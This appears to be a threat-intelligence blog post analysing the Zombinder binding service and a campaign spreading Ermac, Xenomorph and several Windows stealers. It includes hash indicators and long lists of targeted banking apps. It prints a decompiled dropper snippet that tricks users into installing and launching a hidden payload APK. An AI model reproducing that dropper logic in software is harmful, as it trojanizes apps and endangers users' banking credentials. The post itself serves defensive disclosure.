Skip to content

Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers

08 December 2022

Targeting different platforms and introducing Zombinder

The history of the threat landscape has seen several cases of threat actors using Trojans targeting different platforms and systems. This time while analyzing the activity of the Android banking Trojan Ermac, ThreatFabric’s analysts discovered a campaign employing several Trojans, and targeting both Android and Windows users at the same time, in order to reach as much victims as possible. Besides Ermac Android banking Trojan, the campaign involved desktop malware in the form of Erbium, Aurora stealer, and Laplas “clipper”.

This campaign resulted in thousands of victims, having for example Erbium stealer successfully exfiltrate data from more then 1300 victims.

In this blog we also highlight a third-party service on darknet used to bind malicious payloads to legitimate Android applications, that we dubbed Zombinder. It is used to bind a malicious payload to a legitimate application, in order to trick victims to install it.

Everyone needs Wi-Fi

While investigating Ermac’s activity, our researchers spotted an interesting campaign masquerading as applications for Wi-Fi authorization. It was distributed through a fake one-page website containing only two buttons.


As you might have already guessed, the “Download for Android” button leads to downloading samples of Ermac. We classify this variant as Ermac.C, having the following capabilities amongst others that were previously widely reported:

  • Overlay attack to steal PII
  • Keylogging
  • Stealing e-mails from Gmail application
  • Stealing 2FA codes
  • Stealing seed phrases from several cryptocurrency wallets

It is worth mentioning that original actor DukeEugene announced a new version of Ermac (“Ermac 3”) coming soon that will contain new features, but it is still in development at the time of writing this blog.

During the monitoring of abovementioned campaign, we observed several approaches and lures used by the actor. It started with Wi-Fi authorization app which in fact was Ermac with obfuscation of the malicious code. Shortly after our monitoring systems spotted several updates of the payload: in this stage it was masquerading as browser update. However, another detail drew our attention: some of the downloaded apps were not directly Ermac, but a “legitimate” app that, during its normal operation, installed Ermac as payload targeting multiple banking applications that can be found in the Appendix.

Such apps disguised as modified version of Instagram, WiFi Auto Authenticator, Football Live Streaming, etc. The package names were also the same as for legitimate applications.

In fact, the actor used a third-party service provided on darknet to “glue”, or bind, dropper capabilities to a legitimate application. After downloading the bound application, it will act as usual unless it shows a message stating that the app needs to be updated. At this point, if accepted by the victim, the seemingly legitimate application will install this update, which is nothing else than Ermac. The whole process from installing the application to Ermac running on the device can be seen on the following picture.


Such process is achieved by “glueing” obfuscated malicious payload to a legitimate app with minor updates made to original source code to include installation and loading of the malicious payload. We called this dropper “Zombinder”, as it takes the original application and binds malicious code to it, making it a “zombie” that installs the desired payload. The following snippet provides an example of added code to install and launch the payload.

AlertDialog.Builder alertDialog$Builder0 = new AlertDialog.Builder(this);
alertDialog$Builder0.setMessage("This app requires the plugin app to be installed. Please, confirm the installation by the following steps: press Settings -> enable the toggle button -> press Install");
alertDialog$Builder0.setPositiveButton("OK", () - > {
    new Handler().postDelayed(new Runnable() {
        public void run() {
            OverlayActivity.this.isInstalled = OverlayActivity.this.isAppInstalled(;
    }, 3000 L);
    if (!OverlayActivity.this.isInstalled) {
        try {
            File file0 = OverlayActivity.this.getApplicationContext().getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS);
            File file1 = new File(file0, "app.apk");
            StringBuilder stringBuilder0 = new StringBuilder();
            String s = File.separator;
            if (file1.exists()) {
                Intent intent0 = new Intent("android.intent.action.INSTALL_PACKAGE");
                intent0.setDataAndType(FileProvider.getUriForFile(OverlayActivity.this, "com.og.appran.pan.fileprovider", file1), "application/");
                OverlayActivity.this.startActivity(Intent.createChooser(intent0, ""));
        } catch (IOException unused_ex) {}
        OverlayActivity.this.startService(new Intent(OverlayActivity.this, LuckyService.class));
    try {
        Intent intent1 = OverlayActivity.this.getPackageManager().getLaunchIntentForPackage("com.fuyocelasisi.woyopu");
        if (intent1 != null) {
    } catch (Exception unused_ex) {}

The binding service is provided by an actor well-known in the threat landscape, and is an addition to major project: an obfuscation tool that is used by multiple actors on Android criminal scene. The binding service itself was announced in March 2022 and now seems to be used frequently by different actors.


We have observed several “zombie” applications used to distribute mobile malware (e.g. Ermac, Sova).


The latest campaign we identified while writing the blog involving Zombinder was distributing Xenomorph banking trojan under the guise of VidMate application. Just like in the abovementioned campaign, modified legitimate application was downloaded from malicious website mimicking the original website of the application. Victim is navigated there through malicious advertisement.


As a result, Zombinder drops and launches Xenomorph Trojan while the original app remains fully operational, thus victim remains unsuspecting. It is worth noting that authors of Xenomorph (known as HadokenSecurity) continue developing the Trojan. Latest versions of it are enhanced with keylogging functionality, accessibility actions engine as well as SOCKS proxy feature.


This campaign of Xenomorph is targeting banking customers from Spain, Portugal, Canada, full target list can be found in the Appendix.

Multiple Windows threats

However, this campaign has another unique characteristic that we had not observed before and that attracted our attention: the presence of a “Download for Windows” button on the malicious website distributing Ermac. It is common on the mobile threat landscape to utilize multiple Trojans targeting different platforms in one distribution campaign. In this specific case, the actor seems to target Android and Windows platforms in order to expand his/her reach as much as possible. But there is also an option that this is the same landing shared by different actors distributing Android and Windows Trojans. Nevertheless, our team dived into the desktop malware that was distributed along with Ermac.

Erbium Stealer

During our investigation we observed several desktop Trojans connected with this campaign. When we first discovered it, an encrypted archive was distributed, containing the password in the name of the downloaded file. This is a common technique used by threat actors to avoid detection of the original downloaded file by antivirus engines. This archive contained samples of Erbium stealer, quite popular Windows Trojan amongst cyber-criminals, that is able to steal (among other data) saved passwords, credit card details, cookies from various browsers, and “cold” (offline) cryptocurrency wallets data both from desktop applications and browser extensions. The stealer is advertised on cyber-criminals’ forums and on Telegram channel.


Our analysts were able to identify more then 1300 victims of this Erbium stealer campaign, highly likely operated by the same actor behind above-described Ermac campaign.

Laplas Clipper

Not being satisfied, the actor went further: upon launch of Erbium, another Trojan, Laplas “clipper”, was downloaded and installed on the same infected device. Laplas is a relatively new product on darknet markets, and provides its actors with the ability to substitute cryptocurrency wallet address copied by the victim with one controlled by actor. In such cases, the unsuspicious victim copies the address that belongs to the planned recipient of the transfer, but the pasted address is substituted with a different one that looks similar to original. As a result, the transfer will be made to another wallet, owned by the threat actor, while the victim will hardly notice the difference.


Laplas poses itself as a “unique” clipper that is able to generate similar wallet addresses that have the same symbols at the beginning or at the end. Authors seem to continue updating their Trojan and recently released an update to its panel. The authors of Laplas also highlight that their product can be distributed together with stealers, as most of them have the ability to download and launch executables.

However, this is not the end of the story.

Aurora Stealer

While we were working on this blog, our systems spotted another Windows Trojan that was distributed through the same malicious website. This time it was another Windows Trojan stealer known as Aurora. The notable thing about this particular build is its size: more than 300 MB. This is probably a tactic to overcome detection by antivirus engines, as most of the data is just an “overlay” filled with zero bytes. At the same time the actual payload is encrypted and unpacked during the execution of the application.

Aurora is a Golang stealer that has recently started gaining traction on underground forums.


The presence of such a wide variety of Trojans might also indicate that the malicious landing page is used by multiple actors and provided to them as a part of third-party distribution service. However, we cannot


Modern threat landscape becomes more and more sophisticated where actors combine multiple approaches in malware development, distribution, operation as well as in performing fraud itself involving multiple tactics at the same time. New tools appear to make malware less suspicious or more trustworthy for victim which results in more successful fraud cases. Moreover, targeting multiple platforms, actors are able to reach wider “audience” and steal more PII to utilize in further fraud.

Continuous monitoring of mobile threat landscape and tracking of different actors and campaigns allow to identify not only mobile threats but also draw connections to desktop actors/campaigns. Besides, such monitoring pictures an image of modern threat landscape where more and more activities are out-sourced and new actors appear providing distribution, obfuscation, malware development services while already known actors extend their “portfolio”. Threat Intelligence collected allows to build effective and proactive solutions to identify new threats and combat with them.

Financial organizations are welcome to contact us: if you suspect some app be involved in malicious activity, feel free to reach our Mobile Threat Intelligence team which will provide additional details and help with reporting the malicious app if identified:

Fraud Risk Suite

ThreatFabric’s Fraud Risk Suite enables safe & frictionless online customer journeys by integrating industry-leading mobile threat intel, behavioral analytics, advanced device fingerprinting and over 10.000 adaptive fraud indicators. This will give you and your customers peace of mind in an age of ever-changing fraud.


Zombinder Samples

App name Package name SHA-256
WiFi Auto Authenticator com.woosh.wifiautoauth e633cb7abcf94bc9cb1db637d262739b8458ba9b183ea2166c2537aeb57aa1f7
Football live stream com.aufait.footballlivestream dc3e51cffb3b05eec4b9249fb5e52b5530faf8db9b8c15474561ebc59ec172e4
OG com.much.dizzy f43813c43174826f26490230ee43e354c7be2f85dd7d096064a017c3ce6cfa41

Ermac Samples

App name Package name SHA-256
Wi Fi Authorization com.welomuxitononu.voretije 97cbc137f8c045cd6a6b7d828b5b97b50279c2901cc67eec121d2c6df2f576be
Live Football Stream 1.9 com.busafobawori.zuvo 9ed8f39b22b997cb0d2ee8e55336972e1a9feeb222da3c4c23ed6566f29d5a92
OGInsta+ Mod com.fuyocelasisi.woyopu fd477e257d2d68dd43d1490555ac800ab61febf51d07f18d0ed4568f116952b2

Xenomorph Sample

App name Package name SHA-256
VidMate com.focus.equip 8a7309366917e05c348caf79d4f29f60878958baff794f07c12f08dadcb186fa

Erbium Stealer Sample


Laplas Clipper Sample


Aurora Stealer Sample


Ermac Targets

Package name App name SC Mobile Banking (UAE)  
com.snapwork.IDBI IDBI Bank GO Mobile+  
com.Plus500 Plus500: CFD Online Trading on Forex and Stocks  
com.ingbanktr.ingmobil ING Mobil PayPal Mobile Cash: Send and Request Money Fast TSB Mobile Banking Metro Bank  
pt.cgd.caderneta Caderneta BNL Google Play  
com.airbitz Bitcoin Wallet - Airbitz Bitcoin Wallet - Buy BTC Netflix  
gr.winbank.mobilenext Winbank Mobile norisbank App  
com.tarjetanaranja.emisor.serviciosClientes.appTitulares Naranja Caixadirecta Banque pour tablettes Android Triodos Bank. Banca Móvil  
pl.millennium.corpApp Bank Millennium for Companies imo free video calls and chat C.PAY Itaú Empresas: Controle e Gestão do seu Negócio  
com.exmo EXMO Official - Trading crypto on the exchange  
com.bitfinex.mobileapp Bitfinex  
com.teb CEPTETEB N26 — The Mobile Bank  
pt.bctt.appbctt Banco CTT ANZ Shield  
com.mercadolibre Mercado Libre: compra fácil y rápido  
de.santander.presentation Santander Banking HSBC Canada  
com.aadhk.woinvoice Invoice Maker: Estimate & Invoice App  
pl.fakturownia BankSA Mobile Banking HSBCnet Mobile  
pl.pkobp.ipkobiznes iPKO biznes HSBC México  
com.appfactory.tmb Teachers Mutual Bank ADCB  
es.caixageral.caixageralapp Banco Caixa Geral España  
de.ingdiba.bankingapp ING Banking to go  
es.caixagalicia.activamovil ABANCA- Banca Móvil  
cz.csob.smartbanking ČSOB Smartbanking Edge - Bitcoin, Ethereum, Monero, Ripple Wallet ING Italia Bi en Línea Pro: Advanced Bitcoin & Crypto Trading CBD iBOSStoken  
com.eofinance EO.Finance: Buy and Sell Bitcoin. Crypto Wallet  
com.infrasofttech.CentralBank Cent Mobile  
com.EurobankEFG Eurobank Mobile App  
com.azimo.sendmoney Azimo Money Transfer SecureApp netbank  
it.creval.bancaperta Bancaperta  
at.spardat.bcrmobile Touch 24 Banking BCR Barclays  
com.db.pbc.DBPay DB Pay Itaú Uruguay  
com.paxful.wallet Paxful Bitcoin Wallet ePayments: wallet & bank card Burgan Bank  
ar.macro Macro  
com.unocoin.unocoinwallet Unocoin Wallet CitiManager – Corporate Cards  
eu.inmite.prj.kb.mobilbank Mobilni Banka  
com.lynxspa.bancopopolare YouApp  
hu.cardinal.cib.mobilapp CIB Business Online  
com.abanca.bancaempresas ABANCA Empresas ING Australia Banking – Germany‘s largest car market  
com.albarakaapp Albaraka Mobile Banking Interbank APP Macquarie Mobile Banking  
com.mobileloft.alpha.droid myAlpha Mobile  
com.targoes_prod.bad TARGOBANK - Banca a distancia  
com.tecnocom.cajalaboral Banca Móvil Laboral Kutxa My AMP  
com.bitmarket.trader Aplikacja Bitmarket  
eu.netinfo.colpatria.system Scotiabank Colpatria  
com.BOQSecure BOQ Secure Bitcoin Wallet Coincheck Indodax  
com.botw.mobilebanking Bank of the West Mobile  
com.sella.BancaSella Banca Sella Fibabanka Corporate Mobile  
es.pibank.customers Pibank WeChat  
es.univia.unicajamovil UnicajaMovil BBVA Net Cash ES & PT AOL - News, Mail & Video  
ma.gbp.pocketbank Pocket Bank ING Business  
com.getingroup.mobilebanking Getin Mobile  
com.garanti.cepsubesi Garanti BBVA Mobile HSBC UK Mobile Banking  
com.kasikorn.retail.mbanking.wap K PLUS  
io.ethos.universalwallet Ethos Universal Wallet Chase Mobile BBVA Spain - Buy Bitcoin Now Bancolombia App Personas  
com.barclaycardus Barclays US eBay: Buy, sell, and save money on home essentials Wells Fargo Mobile NatWest Mobile Banking Twitter Lite CEX.IO Cryptocurrency Exchange  
com.bankinter.launcher Bankinter Móvil  
pl.eurobank2 eurobank mobile 2.0 Usługi Bankowe  
com.db.pbc.mibanco Mi Banco db  
com.rak RAKBANK Digital Banking  
com.bankofqueensland.boq BOQ Mobile Simplii Financial ŞEKER MOBİL ŞUBE  
com.bitpay.wallet BitPay – Secure Bitcoin Wallet Connect for Hotmail & Outlook: Mail and Calendar HSBC France  
com.bancodebogota.bancamovil Banco de Bogotá  
com.att.myWireless myAT&T  
com.unicredit Mobile Banking UniCredit  
com.btcturk BtcTurk Bitcoin Borsası Amazon Seller  
pl.allegro Allegro - convenient and secure online shopping  
cl.bancochile.mbanking Mi Banco de Chile  
com.bankinter.bkwallet Bankinter Wallet  
com.santander.bpi Santander Private Banking  
softax.pekao.powerpay PeoPay  
com.vancity.mobileapp Vancity Mój Orange  
com.ubercab Uber - Request a ride Western Union ES - Send Money Transfers Quickly  
com.denizbank.mobildeniz MobilDeniz  
com.CredemMobile Credem Kotak - 811 & Mobile Banking ActivoBank Banco Sabadell App. Your mobile bank  
com.vipera.ts.starter.MashreqAE Mashreq UAE Navy Federal Credit Union  
com.samba.mb SambaMobile  
com.aff.otpdirekt OTP SmartBank  
com.mobikwik_new BHIM UPI, Money Transfer, Recharge & Bill Payment  
enbd.mobilebanking Emirates NBD  
com.mtel.androidbea BEA 東亞銀行  
pl.aliorbank.aib Alior Mobile CommBank  
it.carige Carige Mobile Coinbase – Buy & Sell Bitcoin. Crypto Wallet Yono Lite SBI - Mobile Banking ABANCA - Portugal Gmail SBI Anywhere Corporate  
com.fusion.beyondbank Beyond Bank Australia  
cc.bitbank.bitbank bitbank - Bitcoin & Ripple Wallet  
pt.novobanco.nbapp NB smart app  
com.engage.pbb.pbengage2my.release PB engage MY The Co-operative Bank Barclays Kenya  
com.infosys.alh Al Hilal Mobile Banking App ASB Mobile Banking Openbank – banca móvil ANZ Transactive - Global CIBC Mobile Banking®  
com.dhanlaxmi.dhansmart.mtc Dhanlaxmi Bank Mobile Banking  
com.Version1 PNB ONE BROU Llave Digital  
es.ibercaja.ibercajaapp Ibercaja SNB AlAhli Mobile Binance - Buy & Sell Bitcoin Securely  
com.ideomobile.hapoalim בנק הפועלים - ניהול החשבון‎ imaginBank - Your mobile bank  
com.alrajhiretailapp Al Rajhi Mobile Mes Comptes - LCL  
com.grupoavaloc1.bancamovil Banco de Occidente Móvil  
at.volksbank.volksbankmobile Volksbank hausbanking  
pl.ideabank.mobilebanking Idea Bank PL  
com.exictos.mbanka.bic Banco BIC, SA QNB Finansbank Mobile Banking  
hu.mkb.mobilapp MKB Mobilalkalmazás  
com.zellepay.zelle Zelle George Magyarország TransferWise Money Transfer Nexi Pay  
com.todo1.davivienda.mobileapp Davivienda Móvil  
com.s4m EI Bank 三井住友銀行アプリ  
com.rsi.Colonya Colonya Caixa Pollença  
finansbank.enpara Cep Şubesi Sparkasse Ihre mobile Filiale Hype Krungthai NEXT Yahoo Mail – Organized Email  
com.nearform.ptsb permanent tsb  
es.evobanco.bancamovil EVO Banco móvil BOCHK Report HDFC Bank MobileBanking ANZ Australia Bank of Scotland Mobile Banking: secure on the go  
com.bancomer.mbanking BBVA México (Bancomer Móvil) Banca MPS  
eu.eleader.mobilebanking.nbk NBK Mobile Banking  
www.ingdirect.nativeframe ING España. Banca Móvil WiZink, tu banco senZillo BBVA Perú Zip - Shop Now, Pay Later KeyBank Mobile PNC Mobile Banca Móvil BCP  
com.fusion.banking Bank Australia app SCB EASY  
com.mycelium.wallet Mycelium Bitcoin Wallet  
exodusmovement.exodus Exodus: Crypto Bitcoin Wallet  
com.leumi.leumiwallet לאומי‎ mail  
com.zoluxiones.officebanking Banco Santander Perú S.A.  
uy.brou App Móvil del Banco República Halifax: the banking app that gives you extra Cajasur Millenniumbcp Paribu HSBC Malaysia YouTube BBVA Empresas México Pro & Entreprises LCL AXA Banque France TD Canada Bankia Fortuneo, mes comptes banque & bourse en ligne Bank of Melbourne Business App Bank Austria MobileBanking  
com.tronlinkpro.wallet TronLink Pro - The Best TRON Wallet  
com.isis_papyrus.raiffeisen_pay_eyewdg Raiffeisen ELBA Lloyds Bank Mobile Banking: by your side  
es.bancosantander.apps Santander CaixaBank  
com.latuabancaperandroid Intesa Sanpaolo Mobile  
ar.bapro BIP Mobile Santander Argentina NPBS Mobile Banking  
fr.bnpp.digitalbanking Hello bank! par BNP Paribas Moje ING mobile Instagram Macquarie Authenticator People’s United Bank Mobile  
com.pttfinans PTTBank Desjardins mobile services  
com.woodforest Woodforest Mobile Banking  
pl.bzwbk.bzwbk24 Santander mobile  
com.konylabs.cbplpat Citi Handlowy Rossmann PL Payoneer – Global Payments Platform for Businesses VakıfBank Mobil Bankacılık  
org.westpac.col Westpac Corporate Mobile Banca Transilvania National Bank of Canada  
com.cm_prod.bad Crédit Mutuel  
it.bcc.iccrea.mycartabcc myCartaBCC Kutxabank  
pro.huobi Huobi Global  
pl.nestbank.nestbank Nest Bank nowy HSBC Turkey  
es.caixaontinyent.caixaontinyentapp Caixa Ontinyent  
com.magiclick.odeabank Odeabank  
com.krungsri.kma KMA  
com.whatsapp WhatsApp Messenger  
com.moneybookers.skrillpayments.neteller NETELLER - fast, secure and global money transfers  
eu.eleader.mobilebanking.invest plusbank24 Union Bank Mobile Banking Maybank2u MY  
de.consorsbank Consorsbank  
it.relaxbanking RelaxBanking Mobile  
com.pozitron.iscep İşCep - Mobile Banking  
com.cic_prod.bad CIC Royal Bank of Scotland Mobile Banking  
coop.bancocredicoop.bancamobile Credicoop Móvil NBapp Spain Bendigo Bank DIB MOBILE  
it.phoenixspa.inbank Inbank Banque La Banque Postale  
com.suntrust.mobilebanking SunTrust Mobile App  
eu.unicreditgroup.hvbapptan HVB Mobile Banking  
com.ocito.cdn.activity.creditdunord Crédit du Nord pour Mobile  
com.tideplatform.banking Tide - Smart Mobile Banking  
de.dkb.portalapp DKB-Banking  
it.nogood.container UBI Banca  
com.bitcoin.mwallet Bitcoin Wallet  
com.cimbmalaysia CIMB Clicks Malaysia imo beta free calls and text Bank of America Mobile Banking  
com.clairmail.fth Fifth Third Mobile Banking Tangerine Mobile Banking  
posteitaliane.posteapp.appbpol BancoPosta PC Financial Mobile  
mx.bancosantander.supermovil Santander móvil  
com.htsu.hsbcpersonalbanking HSBC Mobile Banking Amazon Shopping - Search, Find, Ship, and Save  
org.toshi Coinbase Wallet — Crypto Wallet & DApp Browser  
com.cbq.CBMobile CBQ Mobile  
com.samourai.wallet Samourai Wallet  
pt.cgd.caixadirectaempresas Caixadirecta Empresas Cash App  
com.empik.empikapp Empik  
eu.eleader.mobilebanking.pekao.firm PekaoBiznes24 myRAMS CA24 Mobile  
pl.pkobp.iko IKO MBNA - Card Services App  
it.popso.SCRIGNOapp SCRIGNOapp Mobile BiznesPl@net Tesco Mobile  
pl.mbank mBank PL  
es.cecabank.ealia2103appstore UniPay Unicaja Santander Money Plan  
com.kubi.kucoin KuCoin: Bitcoin Exchange & Crypto Wallet  
com.bancocajasocial.geolocation Banco Caja Social Móvil Capital One® Mobile  
net.garagecoders.e_llavescotiainfo ScotiaMóvil 住信SBIネット銀行 CUA Mobile Banking Amex BRED  
com.grupocajamar.wefferent Grupo Cajamar  
com.citibanamex.banamexmobile Citibanamex Móvil  
com.mcom.firstcitizens First Citizens Mobile Banking  
com.bancsabadell.wallet Sabadell Wallet  
com.whatsapp.w4b WhatsApp Business  
com.citizensbank.androidapp Citizens Bank Mobile Banking  
com.usbank.mobilebanking U.S. Bank - Inspired by customers St.George Mobile Banking  
fr.banquepopulaire.cyberplus Banque Populaire  
com.rsi ruralvía  
com.tmobtech.halkbank Halkbank Mobil  
es.bancosantander.empresas Santander Empresas BPI APP Bittrex Global Twitter Bankwest  
de.traktorpool tractorpool  
es.ceca.cajalnet Cajalnet  
org.banking.stg.businessconnect St.George Business App Bank of Melbourne Mobile Banking Bank Millennium  
eu.atlantico.bancoatlanticoapp MY ATLANTICO Mes Comptes BNP Paribas Best Bank  
com.ambank.ambankonline AmOnline  
com.bankinter.portugal.bmb Bankinter Portugal  
com.ziraat.ziraatmobil Ziraat Mobile  
com.scotiabank.banking Scotiabank Mobile Banking Boursorama Banque Akbank  
us.zoom.videomeetings ZOOM Cloud Meetings  
pl.ceneo Ceneo - zakupy i promocje Yapı Kredi Mobile CommBiz Suncorp Bank  
com.quoine.quoinex.light Liquid by Quoineライト版(リキッドバイコイン) -ビットコインなどの仮想通貨取引所 Budapest Bank Mobil App  
com.citibank.CitibankMY Citibank MY RBC Mobile BMO Mobile Banking  
com.bankinter.empresas Bankinter Empresas  
com.cbk.mobilebanking CBK Mobile  
com.oxigen.oxigenwallet Bill Payment & Recharge,Wallet  
com.tdbank TD Bank (US)  
com.db.pwcc.dbmobile Deutsche Bank Mobile  
com.kuveytturk.mobil Kuveyt Türk  
com.mobillium.papara Papara  
tsb.mobilebanking TSB Bank Mobile Banking  
ch.autoscout24.autoscout24 AutoScout24 Switzerland – Find your new car  
com.wallet.crypto.trustapp Trust: Crypto & Bitcoin Wallet  
com.advantage.RaiffeisenBank Raiffeisen Smart Mobile イオン銀行通帳アプリ かんたんログイン&残高・明細の確認  
com.konylabs.HongLeongConnect Hong Leong Connect Mobile Banking  
com.targo_prod.bad TARGOBANK Mobile Banking Link Celular Fibabanka Mobile  
com.payeer PAYEER  
pl.bph BusinessPro Lite  
es.santander.Criptocalculadora Criptocalculadora MB WAY BBVA Portugal Westpac Mobile Banking CA Mobile  
eu.eleader.mobilebanking.pekao Pekao24Makler  
com.CIMB.OctoPH CIMB Bank PH  
es.bancosantander.wallet Santander Wallet  
com.bitpanda.bitpanda Bitpanda - Buy Bitcoin in minutes imo HD-Free Video Calls and Chats comdirect mobile App BNP Paribas GOMobile CMSO ma banque : solde, virement & épargne 楽天銀行 -個人のお客様向けアプリ iMobile by ICICI Bank  
es.liberbank.cajasturapp Banca Digital Liberbank Caja de Ingenieros Banca MÓVIL  
com.IngDirectAndroid ING France Microsoft Outlook: Organize Your Email & Calendar  
pt.santandertotta.mobileempresas Santander Empresas UBank Mobile Banking Noble Mobile BMO Digital Banking  
de.commerzbanking.mobil Commerzbank Banking - The app at your side  
hu.cardinal.erste.mobilapp Erste Business MobilBank  
com.greater.Greater Greater Bank  
com.db.pbc.miabanca La Mia Banca ME Bank  
com.ubercab.eats Uber Eats: Food Delivery  
posteitaliane.posteapp.apppostepay Postepay ABN AMRO Mobiel Bankieren Crédit Mutuel de Bretagne  
fr.creditagricole.androidapp Ma Banque  
de.postbank.finanzassistent Postbank Finanzassistent  
mbanking.NBG NBG Mobile Banking  
com.fusion.ATMLocator People’s Choice Credit Union Oney France VR Banking Classic HSBC Australia  
org.telegram.messenger Telegram  
eu.eleader.mobilebanking.abk ABK Mobile Banking  
com.gmowallet.mobilewallet ビットコイン・暗号資産(仮想通貨)ウォレットアプリ GMOコイン|チャート・購入・レバレッジ取引 Snapchat  
com.mediolanum Banco Mediolanum España  
com.facebook.katana Facebook  
com.wrx.wazirx WazirX - Buy Sell Bitcoin & Other Cryptocurrencies  
pl.bps.bankowoscmobilna BPS Mobilnie  
com.viber.voip Viber Messenger - Messages, Group Chats & Calls  
com.infrasofttech.MahaBank Maha Mobile  
pl.raiffeisen.nfc Mobilny Portfel  
org.banking.bsa.businessconnect BankSA Business App  
pl.bzwbk.ibiznes24 iBiznes24 mobile Discover Mobile  
pl.ifirma.ifirmafaktury IFIRMA - Darmowy Program do Faktur  
com.empik.empikfoto Empik Foto  
pl.envelobank.aplikacja Pocztowy  
com.fi7026.godough Commercial Bank Mobile Banking Santander Mobile Banking Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum L’Appli Société Générale  
pt.santandertotta.mobileparticulares Santander Particulares  
com.moneybookers.skrillpayments Skrill - Fast, secure online payments  
fr.laposte.lapostemobile La Poste - Services Postaux  
com.mercadopago.wallet Mercado Pago USAA Mobile  

Xenomorph Targets

Package name App name  
com.exictos.mbanka.bic Banco BIC, SA Meridian Mobile Banking BBVA Portugal  
net.bitbay.bitcoin Bitcoin & Crypto Exchange - BitBay CA Mobile mail  
com.bankinter.launcher Bankinter Móvil PayPal Mobile Cash: Send and Request Money Fast  
com.mediolanum Banco Mediolanum España  
pt.novobanco.nbapp NB smart app HSBC Canada TransferWise Money Transfer Cajasur  
es.pibank.customers Pibank Millenniumbcp  
ca.motusbank.mapp motusbank mobile banking  
com.db.pbc.mibanco Mi Banco db  
es.univia.unicajamovil UnicajaMovil Openbank – banca móvil Simplii Financial CIBC Mobile Banking® BBVA Net Cash ES & PT
es.cecabank.ealia2091appstore ABANCA Pay - Paga y envía dinero con el móvil  
com.plunien.poloniex Poloniex Crypto Exchange RBC Mobile Cash App NBapp Spain  
com.rsi ruralvía  
es.liberbank.cajasturapp Banca Digital Liberbank Yahoo Mail – Organized Email Desjardins mobile services  
es.evobanco.bancamovil EVO Banco móvil Microsoft Outlook: Organize Your Email & Calendar TD Canada Affinity Mobile  
com.shaketh Shakepay: Buy Bitcoin Canada - Bankia Binance - Buy & Sell Bitcoin Securely  
es.ibercaja.ibercajaapp Ibercaja  
com.eqbank.eqbank EQ Bank Mobile Banking Connect for Hotmail & Outlook: Mail and Calendar BPI APP Caixadirecta National Bank of Canada imaginBank - Your mobile bank  
com.anabatic.canadia Canadia Mobile Banking  
es.cecabank.ealia2103appstore UniPay Unicaja  
org.electrum.electrum Electrum Bitcoin Wallet  
es.caixagalicia.activamovil ABANCA- Banca Móvil  
www.ingdirect.nativeframe ING España. Banca Móvil Coinbase – Buy & Sell Bitcoin. Crypto Wallet BBVA Spain WiZink, tu banco senZillo  
com.wavesplatform.wallet Waves.Exchange Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum  
com.scotiabank.banking Scotiabank Mobile Banking Bitstamp – Buy & Sell Bitcoin at Crypto Exchange  
es.caixaontinyent.caixaontinyentapp Caixa Ontinyent Pro: Advanced Bitcoin & Crypto Trading  
com.coastcapitalsavings.dcu Coast Capital Savings  
es.bancosantander.apps Santander  
ca.servus.mbanking Servus Mobile Banking  
com.atb.ATBMobile ATB Personal - Mobile Banking  
com.targoes_prod.bad TARGOBANK - Banca a distancia  
ca.manulife.MobileGBRS Manulife Mobile  
com.grupocajamar.wefferent Grupo Cajamar  
com.tecnocom.cajalaboral Banca Móvil Laboral Kutxa CaixaBank Gmail ABANCA - Portugal Tangerine Mobile Banking  
com.bitfinex.mobileapp Bitfinex MB WAY PC Financial Mobile  

Demo or trial?